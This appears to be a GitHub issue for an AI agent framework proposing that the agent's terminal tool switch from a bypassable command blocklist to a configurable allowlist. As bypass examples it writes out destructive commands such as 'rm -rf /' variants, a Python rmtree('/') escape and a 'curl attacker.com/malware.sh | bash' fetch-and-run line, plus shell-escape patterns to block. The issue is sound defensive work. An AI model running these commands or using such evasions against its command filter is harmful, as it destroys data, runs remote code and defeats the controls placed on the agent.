[Phase 1.2.1] Replace terminal command blocklist with allowlist

[richard-devbot]

Phase

Phase 1 — Critical Security | Track 1.2 — Execution Controls | Priority: P0 CRITICAL

Vulnerability Details

File: operator_use/agent/tools/builtin/terminal.py:9-39
CWE: CWE-78 — OS Command Injection

Current blocklist uses substring matching and is trivially bypassable:

• `rm -rf /` (double space)
• `bash -c "rm -rf /"` (nested shell)
• `python3 -c "import shutil; shutil.rmtree('/')"` (language escape)
• `curl attacker.com/malware.sh | bash` (not blocked at all)

Fix

Switch to allowlist approach:
```python
ALLOWED_COMMAND_PREFIXES = {
"git", "ls", "cat", "head", "tail", "grep", "find", "echo",
"pip", "npm", "node", "python", "pytest", "cargo", "go",
"docker", "kubectl", # configurable per deployment
}
```

Additionally block:

• Pipe to shell (`| bash`, `| sh`)
• Command substitution (`$(...)`, backticks)
• `eval`, `exec`, `source` as subcommands

Make allowlist configurable in config.json so deployments can customize.

Acceptance Criteria

• Blocklist replaced with configurable allowlist
• Shell escape patterns blocked (pipes, substitution, eval)
• Allowlist configurable via config.json
• Security tests cover: allowed commands, blocked commands, all evasion techniques
• Existing functionality not broken (git, installs, scripts still work)

References

• CWE-78
• OWASP Command Injection
• Design Doc: docs/plans/2026-03-29-security-ai-guardrails-performance-design.md